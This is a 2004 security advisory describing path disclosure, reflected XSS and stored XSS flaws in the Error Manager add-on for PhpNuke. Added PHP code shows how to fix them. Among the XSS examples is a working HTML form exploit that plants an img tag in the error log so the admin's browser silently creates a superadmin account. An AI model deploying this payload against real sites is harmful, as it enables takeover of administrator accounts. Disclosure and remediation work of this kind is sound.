Multiple vulnerabilities in Error Manager v2.1 for PhpNuke include path disclosure and XSS.
{===============================================================================}
{ [waraxe-2004-SA#010]                                                          }
{===============================================================================}
{                                                                               }
{ [ Multiple vulnerabilities in Error Manager v2.1 for PhpNuke ]                }
{                                                                               }
{===============================================================================}
Author: Janek Vind "waraxe"
Date: 18. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From developer's readme file:
This Error Manager is made by Gijza.net
The idea came from DR3N.tk
This addon is made for PHP-NUKE 6.0. but may work for other versions
Admin CP is also included in this version.
For the latest version go to www.gijza.net
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure
Let's look at the original code:

    //language
    if( isset( $newlang ) ) {
        include( "language/error/lang-$newlang.php" );
        $language = $newlang;
    } elseif ( isset( $lang ) ) {
        include( "language/error/lang-$lang.php" );
        $language = $lang;
    } else {
        include( "language/error/lang-$language.php" );
    }
So nothing stops us from requesting this PHP file directly, and this leads to a
standard PHP error message revealing the full path to error.php:

http://localhost/nuke71/error.php?newlang=foobar

Warning: main(language/error/lang-foobar.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke71\error.php on line 19
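The root cause above is that a request value is interpolated straight into include(), so any name that has no matching file produces a warning carrying the script path. The following is an added example, not Error Manager's code: a replacement for that block that accepts only names matching an allow-list built from the files actually present in language/error/, and falls back to a default otherwise. The directory layout, the default language name and the use of $_GET instead of register_globals are assumptions.

```php
<?php
// Added example (not part of Error Manager). Hardened replacement for the
// language include: the requested name is validated against the lang-*.php
// files that really exist, so include() never sees an unexpected value and
// never emits a warning that leaks the script's filesystem path.

define('ERROR_LANG_DIR', __DIR__ . '/language/error'); // assumed layout
define('ERROR_DEFAULT_LANG', 'english');               // assumed default name

// List the language names for which a lang-<name>.php file exists.
function available_error_languages()
{
    $files = glob(ERROR_LANG_DIR . '/lang-*.php');
    if ($files === false) {
        $files = [];
    }
    $names = [];
    foreach ($files as $path) {
        $base    = basename($path, '.php');        // e.g. "lang-english"
        $names[] = substr($base, strlen('lang-')); // e.g. "english"
    }
    return $names;
}

// Return the validated language name, or the fallback when the request
// value is missing, malformed (anything but a short lowercase word, so no
// "../", NUL bytes or URL tricks) or has no matching file.
function resolve_error_language($requested, $fallback = ERROR_DEFAULT_LANG)
{
    if (!is_string($requested) || !preg_match('/^[a-z]{2,20}$/', $requested)) {
        $requested = $fallback;
    }
    if (!in_array($requested, available_error_languages(), true)) {
        // Not even the fallback exists: signal "nothing to include".
        return in_array($fallback, available_error_languages(), true) ? $fallback : null;
    }
    return $requested;
}

// Same precedence as the original (newlang, then lang, then the default),
// but read from the request array rather than from register_globals.
$requested = $_GET['newlang'] ?? $_GET['lang'] ?? ERROR_DEFAULT_LANG;
$language  = resolve_error_language($requested);

// After validation the file is known to exist, so no warning can be raised.
if ($language !== null) {
    include ERROR_LANG_DIR . "/lang-$language.php";
}
```

Validating against the directory listing rather than a hard-coded array means a newly added language file works without code changes, while a request for "foobar" silently gets the default instead of a warning with the full path in it.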
2. Cross-Site Scripting aka XSS
Again, let's look at the original code:

    if ($error == 401) {
        $pagetitle = "- "._EM401."";
    }
    if ($error == 403) {
        $pagetitle = "- "._EM403."";
    }
    if ($error == 404) {
        $pagetitle = "- "._EM404."";
    }
    if ($error == 500) {
        $pagetitle = "- "._EM500."";
    }
This is traditionally coded using the "switch/case" language construct, but for
some reason the author uses an "if/if/if/..." construction here, not even
"if/elseif/elseif/else". And we can see that if the variable $error is not 401,
403, 404 or 500 but something else, then the UNINITIALIZED $pagetitle can be set
to any value. This of course leads to XSS conditions:
http://localhost/nuke71/error.php?pagetitle=[xss code here]
One more way to XSS exploiting:
http://localhost/nuke71/error.php?error=>[xss code here]
As with all the PhpNuke XSS cases, using POST parameters or, even better, COOKIE
parameters will be preferred, because the GET parameters are strictly filtered in
mainfile.php.
3. Script injection to error log (nasty one!)
This one is my favourite bug. I mean, Error Manager is supposed to log the error
conditions on the web server so that the admin can find potential bugs on the
site, and of course this logging feature will reveal to the admin many
(unsuccessful) attacks by "bad guys". It's a shame, but it's true: error logging
in Error Manager will log the referer, request URI, etc., but WITHOUT ANY
sanitizing against HTML tags ;)

So we can inject any JavaScript code into the error log, and when the admin
browses the logs, the website can be compromised: for example, cookies can be
stolen, additional superadmin accounts can be created without the knowledge of
the admin (reference to [waraxe-2004-SA#008 - easy way to get superadmin rights
in PhpNuke 6.x-7.1.0]), etc.

So, here is an attack scenario:

Write an HTML file like this one:
    <HTML>
    <HEAD><TITLE>Error Manager sploit</TITLE>
    </HEAD>
    <BODY bgcolor="#000000" text="#FFFFFF">
    <br><br><br>
    <center>
    <FORM action="http://www.victim.com/error.php" method="POST">
    <input type="hidden" name="error" value="<img width='0' height='0' border='0' src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1'></img>404">
    <input type="submit" value="Attack">
    </FORM>
    </center>
    <br><br><br>
    </BODY>
    </HTML>
Use it against the victim server and then just wait till the admin reads the
error log, and then log in to your brand new superadmin account ;)
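Findings 2 and 3 share one defect: request-derived data reaches an HTML context (the page title, and the log viewer the admin opens) without being initialised or encoded. The block below is an added example, not Error Manager's code, that fixes both at once: the title is always assigned through a switch with a default branch, so no request variable can supply it, and every field written to the error log is HTML-encoded and stripped of line breaks before it is stored, so a log viewer that echoes the entries back cannot execute injected markup. The _EM* constants, the log file path and the use of $_REQUEST are assumptions made for the example.

```php
<?php
// Added example (not part of Error Manager). Hardening for the XSS findings:
// (1) $pagetitle is always initialised via switch/default, never left for a
//     request variable to fill in;
// (2) request-derived values are HTML-encoded before they are written to the
//     error log, so the admin's log viewer shows "<img ...>" as text.

// Constants assumed to come from the language file; defined here so the
// example runs stand-alone.
if (!defined('_EM401')) { define('_EM401', 'Unauthorized'); }
if (!defined('_EM403')) { define('_EM403', 'Forbidden'); }
if (!defined('_EM404')) { define('_EM404', 'Not Found'); }
if (!defined('_EM500')) { define('_EM500', 'Internal Server Error'); }
define('ERROR_LOG_FILE', __DIR__ . '/error_manager.log'); // assumed path

// Map the error code to a title. Anything not on the list gets a generic
// title, so the variable is never uninitialised. The (int) cast turns
// values such as "404<script>" or ">[xss]" into 404 or 0 respectively.
function error_page_title($error)
{
    switch ((int) $error) {
        case 401: $title = _EM401; break;
        case 403: $title = _EM403; break;
        case 404: $title = _EM404; break;
        case 500: $title = _EM500; break;
        default:  $title = 'Unknown error'; break;
    }
    return '- ' . $title;
}

// Encode one value so it is inert when the log is rendered as HTML, and
// collapse line breaks so an entry cannot forge extra log lines.
function log_field($value)
{
    $value = is_string($value) ? $value : '';
    $value = str_replace(["\r", "\n"], ' ', $value);
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Build a single tab-separated log line; every request-derived field goes
// through log_field(), including the raw $error value.
function error_log_entry(array $server, $error)
{
    return implode("\t", [
        date('c'),
        log_field($server['REMOTE_ADDR']     ?? ''),
        log_field($server['REQUEST_URI']     ?? ''),
        log_field($server['HTTP_REFERER']    ?? ''),
        log_field($server['HTTP_USER_AGENT'] ?? ''),
        log_field((string) $error),
    ]) . "\n";
}

// Usage in the error page (GET, POST and COOKIE are all covered by $_REQUEST,
// which matters here since the advisory notes GET is filtered but POST and
// COOKIE are not).
$error     = $_REQUEST['error'] ?? '';
$pagetitle = error_page_title($error);
file_put_contents(ERROR_LOG_FILE, error_log_entry($_SERVER, $error), FILE_APPEND | LOCK_EX);
echo '<title>' . htmlspecialchars($pagetitle, ENT_QUOTES, 'UTF-8') . '</title>';
```

With this in place the form in the scenario above still gets logged, but the stored entry reads `&lt;img width=&#039;0&#039; ...` and the admin's browser renders it as text; encoding at write time also protects any other tool that later displays the log, though a viewer should still encode on output as a second layer.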
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum staff and to all IT security related people in Estonia!
Greetings!
Special greets to ulljobu!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[email protected]
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------